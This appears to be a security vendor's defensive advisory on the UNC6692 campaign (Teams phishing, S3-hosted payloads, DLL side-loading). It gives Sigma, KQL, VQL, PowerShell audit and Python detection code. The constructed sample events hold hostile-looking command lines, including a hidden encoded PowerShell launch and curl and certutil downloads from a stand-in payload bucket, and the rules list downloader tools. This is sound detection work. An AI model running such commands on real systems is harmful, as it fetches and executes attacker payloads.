
UNC6692 Campaign: Defending Against Microsoft Teams Phishing, S3 Payloads, and Snow Malware

Security Arsenal Team
April 28, 2026

Introduction

A sophisticated threat actor tracked as UNC6692 is actively leveraging trusted collaboration channels to bypass traditional email security defenses. By weaponizing Microsoft Teams, abusing legitimate AWS S3 buckets for payload hosting, and deploying a custom malware suite known as "Snow," this group has successfully established initial access in targeted environments.

This campaign is particularly dangerous because it shifts the attack vector from the inbox, where most organizations have mature filtering, to the chat interface, where users are conditioned to trust links and files from colleagues. Defenders should treat external Teams interactions as untrusted by default and adjust detection coverage accordingly.

Technical Analysis

The Attack Chain

UNC6692 operates a multi-stage attack chain designed to maximize social engineering success while evading network boundary defenses:

  1. Initial Access (Teams Phishing): Attackers use compromised external Microsoft 365 tenant accounts to send Teams messages to target users. These messages masquerade as legitimate business communications, such as HR changes or shared documents, and carry malicious links or file attachments.
  2. Payload Delivery (Cloud Abuse): Instead of hosting malware on their own infrastructure, which is easily blocklisted, the actors serve it from AWS S3 buckets, either newly created or otherwise legitimate buckets they control, often through pre-signed URLs. Because the download comes from a reputable cloud domain, blocking it at the network layer is hard to do without impacting business operations.
  3. Execution (Snow Malware): The downloaded payload is a custom malware suite dubbed "Snow." It is typically packaged to look like a legitimate installer or utility and relies on DLL side-loading to execute its code.
  4. Command & Control (C2): The malware establishes C2 channels, often fronted by services like Cloudflare Workers, to blend in with normal web traffic.

Affected Platforms & Components

  • Platform: Microsoft 365 (Microsoft Teams)
  • Infrastructure: Amazon Web Services (AWS) S3
  • Malware Family: "Snow" (Custom toolkit)
  • Status: Active campaign with confirmed in-the-wild targeting. This is not theoretical; UNC6692 is currently engaging targets.

Defensive Gaps

This campaign highlights a critical blind spot for many SOC teams:

  • Lack of Visibility: Most SIEMs do not ingest Microsoft Teams audit events by default (in Microsoft Sentinel they land in OfficeActivity only when the Office 365 connector's Teams option is enabled), so the initial phishing contact is invisible.
  • Trust in Cloud Domains: Firewall and proxy rules often allow full egress to *.amazonaws.com, providing a safe haven for payload delivery.
  • Endpoint Evasion: The "Snow" malware uses living-off-the-land (LotL) binaries and DLL side-loading into trusted, signed executables to evade simple AV signatures.

Detection & Response

The following detection rules are prioritized to catch the unique TTPs of the UNC6692 campaign, specifically focusing on anomalous Teams process behavior and suspicious interactions with cloud storage endpoints.

Sigma Rules

YAML
---
title: Suspicious Microsoft Teams Child Process
id: 8a4b2c19-1d3e-4f5a-9b6c-7d8e9f0a1b2c
status: experimental
description: Detects the Microsoft Teams client (classic Teams.exe or new ms-teams.exe) spawning a shell or script interpreter. Teams does not normally launch these processes; this indicates a user executing a file received in chat or command execution through the client.
references:
  - https://attack.mitre.org/techniques/T1059/
  - https://www.darkreading.com/cloud-security/unc6692-social-engineering-malware-cloud-abuse
author: Security Arsenal
date: 2025/04/07
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1059.003
  - attack.t1059.005
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\Teams.exe'
      - '\ms-teams.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Administrators debugging the Teams client (rare)
  - Teams apps or plugins that legitimately spawn helper processes; tune per environment
level: high
---
title: Command-Line Downloader Fetching Content from AWS S3
id: 9c5d3e20-2e4f-4a6b-8c7d-1e2f3a4b5c6d
status: experimental
description: Detects command-line download utilities retrieving content from an Amazon S3 endpoint, or such a utility being spawned directly by a web browser. UNC6692 stages payloads in S3 buckets so delivery traffic blends in with legitimate AWS usage. Process creation telemetry cannot see a browser's own downloads; pair this rule with proxy or DNS logging for that path.
references:
  - https://attack.mitre.org/techniques/T1105/
  - https://attack.mitre.org/techniques/T1608/001/
author: Security Arsenal
date: 2025/04/07
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\curl.exe'
      - '\wget.exe'
      - '\bitsadmin.exe'
      - '\certutil.exe'
  selection_aws:
    CommandLine|contains: 'amazonaws.com'
  selection_s3:
    # covers s3.amazonaws.com, <bucket>.s3.<region>.amazonaws.com and <bucket>.s3-<region>.amazonaws.com
    CommandLine|contains:
      - 's3.'
      - 's3-'
  selection_browser_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  condition: selection_img and ((selection_aws and selection_s3) or selection_browser_parent)
falsepositives:
  - Developers and build agents using curl or scripted downloads against S3
level: medium
---
title: Potential DLL Side-Loading from Temp Directory
id: 0d1e2f30-3f5a-4b7c-8d9e-0a1b2c3d4e5f
status: experimental
description: Detects a process loading an unsigned DLL from the user's temporary directory. The "Snow" malware uses DLL side-loading, dropping its DLL next to a legitimate executable under AppData\Local\Temp so that the trusted binary loads it.
references:
  - https://attack.mitre.org/techniques/T1574/001/
  - https://attack.mitre.org/techniques/T1574/002/
author: Security Arsenal
date: 2025/04/07
tags:
  - attack.defense_evasion
  - attack.t1574.001
  - attack.t1574.002
logsource:
  category: image_load
  product: windows
detection:
  selection:
    ImageLoaded|contains: '\AppData\Local\Temp\'
    ImageLoaded|endswith: '.dll'
  filter_signed:
    Signed: 'true'
  condition: selection and not filter_signed
falsepositives:
  - Installers and self-extracting archives that stage unsigned DLLs in Temp
  - Developer tooling that compiles or unpacks DLLs into Temp
level: medium
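Before shipping rules like the three above to a SIEM it pays to run their logic over a handful of known-good and known-bad events, in particular to confirm that the signed-image filter excludes signed DLLs rather than unsigned ones, and that the S3 matcher requires both the amazonaws.com domain and an s3 host label. The following Python is an added example written for this page, not code from the original post or from any vendor tool: it implements the selections as plain predicates and evaluates them over constructed Sysmon-style events whose paths, command lines, bucket name and event IDs are all made up.

```python
"""The Sigma logic above as plain predicates, run over constructed Sysmon-style
events. Keys are the Sigma Windows field names (Image, ParentImage, CommandLine,
ImageLoaded, Signed). Sigma string modifiers match case-insensitively, so every
comparison lowercases both sides. Paths, command lines and event IDs are made up."""


def _endswith_any(value: str, suffixes) -> bool:
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value: str, needles) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)


def teams_child_process(ev: dict) -> bool:
    """Teams client (classic Teams.exe or new ms-teams.exe) spawning a shell or script host."""
    return (_endswith_any(ev.get("ParentImage", ""), [r"\Teams.exe", r"\ms-teams.exe"])
            and _endswith_any(ev.get("Image", ""),
                              [r"\powershell.exe", r"\pwsh.exe", r"\cmd.exe",
                               r"\wscript.exe", r"\cscript.exe"]))


def s3_downloader(ev: dict) -> bool:
    """Command-line downloader with an S3 endpoint on its command line, or a downloader
    launched directly by a browser. Both the 's3.' and legacy 's3-' host forms are covered."""
    cli = ev.get("CommandLine", "")
    is_downloader = _endswith_any(ev.get("Image", ""),
                                  [r"\curl.exe", r"\wget.exe", r"\bitsadmin.exe", r"\certutil.exe"])
    s3_endpoint = "amazonaws.com" in cli.lower() and _contains_any(cli, ["s3.", "s3-"])
    browser_parent = _endswith_any(ev.get("ParentImage", ""),
                                   [r"\chrome.exe", r"\msedge.exe", r"\firefox.exe"])
    return is_downloader and (s3_endpoint or browser_parent)


def temp_unsigned_dll(ev: dict) -> bool:
    """Unsigned DLL loaded from AppData\\Local\\Temp, the side-loading profile. The filter
    must exclude *signed* images; excluding unsigned ones would invert the rule."""
    loaded = ev.get("ImageLoaded", "")
    in_temp = "\\appdata\\local\\temp\\" in loaded.lower() and loaded.lower().endswith(".dll")
    signed = str(ev.get("Signed", "")).lower() == "true"  # Sysmon logs Signed as "true"/"false"
    return in_temp and not signed


RULES = {
    "Teams child process": teams_child_process,
    "S3 download via LOLBin": s3_downloader,
    "Unsigned DLL from Temp": temp_unsigned_dll,
}


def evaluate(events):
    """Return (EventId, rule name) for every rule that fires on each event, in event order."""
    return [(ev["EventId"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"EventId": 1, "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"EventId": 2, "ParentImage": r"C:\Program Files\WindowsApps\MSTeams_x64\ms-teams.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\msedgewebview2.exe",
     "CommandLine": "msedgewebview2.exe --embedded-browser-webview=1"},  # benign Teams child
    {"EventId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -o setup.zip https://payload-bucket.s3.eu-west-1.amazonaws.com/setup.zip?X-Amz-Signature=9f2c"},
    {"EventId": 4, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -s https://api.github.com/repos/SigmaHQ/sigma/releases/latest"},  # benign curl
    {"EventId": 5, "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f https://cdn.example.net/x.txt x.txt"},
    {"EventId": 6, "Image": r"C:\Users\alice\AppData\Local\Temp\Setup\updater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\Setup\version.dll", "Signed": "false"},
    {"EventId": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\Setup\updater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\Setup\msvcr120.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for event_id, name in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: {name}")
```

Events 2, 4 and 7 are the benign controls: a Teams WebView child, curl against GitHub, and a signed runtime DLL in Temp; none of them should fire, and event 5 fires only because the downloader's parent is a browser.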

KQL (Microsoft Sentinel)

This hunt query finds Teams chat activity involving guest or federated (external-tenant) users and your own users, then looks for downloads from S3 or connections to Cloudflare Workers from the internal participant's device within a short window afterwards, since Workers is often used for C2 fronting in this campaign. It assumes the Office 365 connector (Teams audit records in OfficeActivity) and the Defender for Endpoint connector (DeviceNetworkEvents) are both enabled; replace contoso.com with your tenant domain.

KQL — Microsoft Sentinel / Defender
// Hunt: Teams chats involving external (guest or federated) users, followed within a short
// window by S3 or Cloudflare Workers traffic from the internal participant's device.
// Assumes the Office 365 (Teams) and Defender for Endpoint connectors; replace contoso.com.
let TenantDomain = "contoso.com";
let Lookback = 7d;
let Window = 2h;
let ExternalTeamsContacts =
    OfficeActivity
    | where TimeGenerated > ago(Lookback) and RecordType == "MicrosoftTeams"
    | where Operation in~ ("MessageSent", "MessageCreatedHasLink", "ChatCreated", "MemberAdded")
    | mv-expand Member = Members
    | extend MemberUpn = tolower(tostring(Member.UPN))
    | extend IsExternal = MemberUpn contains "#ext#" or MemberUpn !endswith strcat("@", TenantDomain)
    | summarize ContactTime = min(TimeGenerated),
                ExternalUsers = make_set_if(MemberUpn, IsExternal),
                TargetUsers = make_set_if(MemberUpn, not(IsExternal))
        by ChatThreadId, Operation, Sender = UserId, ClientIP
    | where array_length(ExternalUsers) > 0
    | mv-expand TargetUpn = TargetUsers to typeof(string);
let SuspiciousNetworkTraffic =
    DeviceNetworkEvents
    | where Timestamp > ago(Lookback)
    | where (RemoteUrl contains "amazonaws.com" and RemoteUrl contains "s3")
         or RemoteUrl endswith "workers.dev"
    // Workers traffic is only interesting when a non-browser process initiates it
    | where not(RemoteUrl endswith "workers.dev"
                and InitiatingProcessFileName in~ ("msedge.exe", "chrome.exe", "firefox.exe"))
    | extend TargetUpn = tolower(InitiatingProcessAccountUpn)
    | project Timestamp, DeviceName, TargetUpn, RemoteUrl, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine;
ExternalTeamsContacts
| join kind=inner SuspiciousNetworkTraffic on TargetUpn
| where Timestamp between (ContactTime .. (ContactTime + Window))  // traffic shortly after the contact
| project ContactTime, Timestamp, DeviceName, TargetUpn, Sender, ExternalUsers, Operation,
          RemoteUrl, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by ContactTime asc

Velociraptor VQL

This artifact hunts for "Snow" indicators on the endpoint: DLL and EXE files written to user Temp directories in the last 24 hours (where dropped side-loading DLLs land; look for names such as version.dll or msvcr*.dll sitting next to a signed executable) and shell or script interpreters whose parent is the Teams client (classic Teams.exe or new ms-teams.exe). VQL has no UNION operator, so the two result sets are combined with chain().

VQL — Velociraptor
-- Hunt for Snow malware indicators: recently written DLL/EXE files in user Temp
-- directories, and shell/script interpreters spawned by the Teams client.
LET RecentTempBinaries = SELECT
    OSPath AS FilePath,
    Size,
    Mtime AS ModifiedTime,
    Mode.String AS Mode
  FROM glob(globs="C:/Users/*/AppData/Local/Temp/**/*.{dll,exe}")
  WHERE NOT IsDir
    AND Mtime > timestamp(epoch=now() - 86400)   -- modified in the last 24 hours

-- Materialize the Teams PIDs (classic Teams.exe and new ms-teams.exe) for the child lookup
LET TeamsPids <= SELECT Pid FROM pslist()
  WHERE Name =~ "(?i)^(ms-)?teams\\.exe$"

LET SuspiciousProcesses = SELECT
    Pid,
    Ppid,
    Name,
    Exe,
    CommandLine
  FROM pslist()
  WHERE (Ppid IN TeamsPids.Pid
         AND Name =~ "(?i)^(powershell|pwsh|cmd|wscript|cscript)\\.exe$")
     OR (Name =~ "(?i)^(ms-)?teams\\.exe$" AND CommandLine =~ "--remote-debugging")

-- VQL has no UNION; chain() emits the rows of each query in turn
SELECT * FROM chain(
  files=RecentTempBinaries,
  processes=SuspiciousProcesses)

Remediation Script (PowerShell)

This script audits the tenant's current Teams federation and external access configuration and prints the commands that restrict communication with unmanaged domains, a key step in stopping UNC6692. It only reads configuration; apply the printed commands after review.

PowerShell
# Security Arsenal: Hardening audit for the UNC6692 Teams vector
# Requires the MicrosoftTeams PowerShell module (Install-Module MicrosoftTeams) and a
# Teams administrator role. The retired SkypeOnlineConnector is no longer supported.

Write-Host "Checking Microsoft Teams External Access Policies..." -ForegroundColor Cyan

try {
    if (-not (Get-Module -ListAvailable -Name MicrosoftTeams)) {
        throw "MicrosoftTeams module not found. Run: Install-Module MicrosoftTeams -Scope CurrentUser"
    }
    Import-Module MicrosoftTeams -ErrorAction Stop

    # Connect-MicrosoftTeams prompts for credentials when run interactively;
    # uncomment it here, or connect beforehand and leave it commented.
    # Connect-MicrosoftTeams

    $FederationConfig = Get-CsTenantFederationConfiguration
    Write-Host "Current Federation State:" -ForegroundColor Yellow
    Write-Host "  AllowFederatedUsers:            $($FederationConfig.AllowFederatedUsers)"
    Write-Host "  AllowTeamsConsumer:             $($FederationConfig.AllowTeamsConsumer)"
    Write-Host "  AllowTeamsConsumerInbound:      $($FederationConfig.AllowTeamsConsumerInbound)"
    Write-Host "  ExternalAccessWithTrialTenants: $($FederationConfig.ExternalAccessWithTrialTenants)"
    Write-Host "  AllowedDomains:                 $($FederationConfig.AllowedDomains)"
    Write-Host "  BlockedDomains:                 $($FederationConfig.BlockedDomains)"

    $ExternalPolicy = Get-CsExternalAccessPolicy -Identity Global
    Write-Host "Current Global External Access Policy:" -ForegroundColor Yellow
    Write-Host "  EnableFederationAccess:         $($ExternalPolicy.EnableFederationAccess)"
    Write-Host "  EnablePublicCloudAccess:        $($ExternalPolicy.EnablePublicCloudAccess)"
    Write-Host "  EnableTeamsConsumerAccess:      $($ExternalPolicy.EnableTeamsConsumerAccess)"

    Write-Host "`nREMEDIATION ADVICE (review before applying):" -ForegroundColor Red
    Write-Host "Block all external Teams federation (high security):"
    Write-Host '  Set-CsExternalAccessPolicy -Identity Global -EnableFederationAccess $false' -ForegroundColor Green

    Write-Host "`nAllow only named partner domains (allow-list approach):"
    Write-Host '  Set-CsTenantFederationConfiguration -AllowFederatedUsers $true -AllowedDomainsAsAList @("contoso.com", "fabrikam.com")' -ForegroundColor Green

    Write-Host "`nBlock chats from trial tenants, which attackers frequently use as throwaway senders:"
    Write-Host '  Set-CsTenantFederationConfiguration -ExternalAccessWithTrialTenants Blocked' -ForegroundColor Green

    Write-Host "`nBlock unmanaged Teams (consumer) accounts:"
    Write-Host '  Set-CsTenantFederationConfiguration -AllowTeamsConsumer $false -AllowTeamsConsumerInbound $false' -ForegroundColor Green
}
catch {
    Write-Error "An error occurred: $_"
}

Remediation

Immediate Actions

  1. Restrict Teams External Access: Modify the Global Teams External Access Policy to block federation or, at a minimum, implement an allow-list for trusted partner domains. This is the single most effective control against this specific vector.

    • Command: Set-CsExternalAccessPolicy -Identity Global -EnableFederationAccess $false
  2. Block Suspicious Cloud Domains: While blocking all of s3.amazonaws.com is rarely feasible, inspect proxy logs for downloads of executables (.exe, .msi, .dll) from S3 buckets and block specific malicious bucket identifiers. Watch for traffic to workers.dev (Cloudflare Workers) originating from non-browser processes.

  3. User Awareness: Issue a security advisory to all staff highlighting that "phishing is now happening in Teams." Instruct users to check the sender's identity (Teams tags accounts from other tenants with an "External" label; hovering over the name shows the full email address and tenant) and to be wary of unsolicited file transfers or meeting invites from external tenants.
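Step 2 above asks analysts to find executable downloads from S3 in proxy logs and to block the specific bucket rather than all of amazonaws.com, which means recovering the bucket name from any of S3's URL forms: virtual-hosted (bucket.s3.amazonaws.com and bucket.s3.region.amazonaws.com), the legacy dash form (bucket.s3-region.amazonaws.com), dualstack endpoints and path-style (s3.amazonaws.com/bucket/key). The following Python is an added example written for this page, not code from the original post or from any vendor tool; it parses all of those forms, flags pre-signed requests, and extracts the buckets to block from constructed Squid-style access log lines whose hosts, users and bucket names are invented.

```python
"""Find executable downloads from Amazon S3 in proxy logs and recover the bucket
names to block. Handles every S3 REST URL form: virtual-hosted
(<bucket>.s3.amazonaws.com, <bucket>.s3.<region>.amazonaws.com), the legacy
dash form (<bucket>.s3-<region>.amazonaws.com), dualstack endpoints and
path-style (s3.amazonaws.com/<bucket>/..., s3.<region>.amazonaws.com/<bucket>/...).
The log lines below are constructed for this example; they are not real telemetry."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

S3_HOST = re.compile(
    r"^(?:(?P<bucket>.+?)\.)?s3(?:[.-](?P<region>[a-z0-9-]+(?:\.[a-z0-9-]+)*))?\.amazonaws\.com$"
)
# .exe/.msi/.dll are the extensions named in the text; .iso and .zip are added
# here because side-loading kits (a signed EXE plus a malicious DLL) ship as archives.
EXECUTABLE_EXT = (".exe", ".msi", ".dll", ".iso", ".zip")


@dataclass(frozen=True)
class S3Object:
    bucket: str
    key: str
    region: Optional[str]
    presigned: bool


@dataclass(frozen=True)
class Finding:
    client_ip: str
    user: str
    obj: S3Object
    url: str


def parse_s3_url(url: str) -> Optional[S3Object]:
    """Return bucket/key/region for any S3 REST URL, or None for non-S3 URLs."""
    parts = urlsplit(url)
    m = S3_HOST.match((parts.hostname or "").lower())
    if not m:
        return None
    bucket, region = m.group("bucket"), m.group("region")
    key = unquote(parts.path).lstrip("/")
    if bucket is None:  # path-style: the first path segment is the bucket
        bucket, _, key = key.partition("/")
        if not bucket:
            return None
    if region and region.startswith("dualstack."):
        region = region[len("dualstack."):]
    query = parse_qs(parts.query)
    # SigV4 pre-signed URLs carry X-Amz-Signature; legacy SigV2 ones carry Signature + AWSAccessKeyId
    presigned = "X-Amz-Signature" in query or ("Signature" in query and "AWSAccessKeyId" in query)
    return S3Object(bucket=bucket, key=key, region=region, presigned=presigned)


def executable_downloads(log_lines: List[str]) -> List[Finding]:
    """Parse Squid-style access log lines (ts client user method url status bytes)
    and return successful GETs of executable content from S3."""
    findings = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 7 or fields[3].upper() != "GET" or not fields[5].startswith("2"):
            continue
        obj = parse_s3_url(fields[4])
        if obj is None or not obj.key.lower().endswith(EXECUTABLE_EXT):
            continue
        findings.append(Finding(client_ip=fields[1], user=fields[2], obj=obj, url=fields[4]))
    return findings


def buckets_to_block(findings: List[Finding]) -> List[str]:
    """Distinct bucket names seen serving executables: the identifiers to block at the
    proxy instead of all of amazonaws.com."""
    return sorted({f.obj.bucket for f in findings})


SAMPLE_PROXY_LOG = [  # constructed sample; hosts, users and bucket names are invented
    "1714300000.123 10.0.4.21 alice GET https://payload-bucket.s3.eu-west-1.amazonaws.com/Setup/TeamsUpdate.exe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Signature=9f2c 200 4812034",
    "1714300004.551 10.0.4.21 alice GET https://s3.amazonaws.com/payload-bucket/Setup/version.dll 200 212992",
    "1714300010.002 10.0.4.33 bob GET https://corp-assets.s3.amazonaws.com/images/logo.png 200 8123",
    "1714300021.777 10.0.4.40 carol GET https://ec2.us-east-1.amazonaws.com/?Action=DescribeInstances 200 2048",
    "1714300030.010 10.0.4.50 dave GET https://legacy-data.s3-us-west-2.amazonaws.com/archive/tool.msi 200 900000",
    "1714300044.900 10.0.4.50 dave GET https://legacy-data.s3-us-west-2.amazonaws.com/archive/tool.msi 403 0",
]

if __name__ == "__main__":
    hits = executable_downloads(SAMPLE_PROXY_LOG)
    for f in hits:
        print(f"{f.client_ip} {f.user} bucket={f.obj.bucket} key={f.obj.key} "
              f"region={f.obj.region} presigned={f.obj.presigned}")
    print("block:", buckets_to_block(hits))
```

The pre-signed flag matters for triage: a presigned download of an .exe by an ordinary user is exactly the pattern described in the attack chain, while an unsigned fetch of a PNG from a corporate bucket is noise. Replace the Squid field layout in executable_downloads with your own proxy's format; the S3 parsing is independent of it.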

Long-Term Hardening

  • Enable Safe Links for Teams: Microsoft Defender for Office 365 includes Safe Links protection for Teams. Ensure the policy is enabled and set to "On" for Teams messages so URLs are checked at click time.
  • Cross-Tenant Access and Conditional Access: Conditional Access governs sign-ins to your own tenant, so it does not reach federated chat from another tenant; the Teams federation settings above are the control for that path. For guest (B2B) accounts, use Microsoft Entra cross-tenant access settings to limit which tenants may collaborate with you and to trust MFA and compliant-device claims from approved partners, then apply Conditional Access to guests so unmanaged external accounts cannot reach internal resources.
  • Audit AWS S3: Ensure your own organization's S3 buckets are not publicly writable and that credentials able to write to them are not exposed, so they cannot be turned into payload hosting by this or other actors.
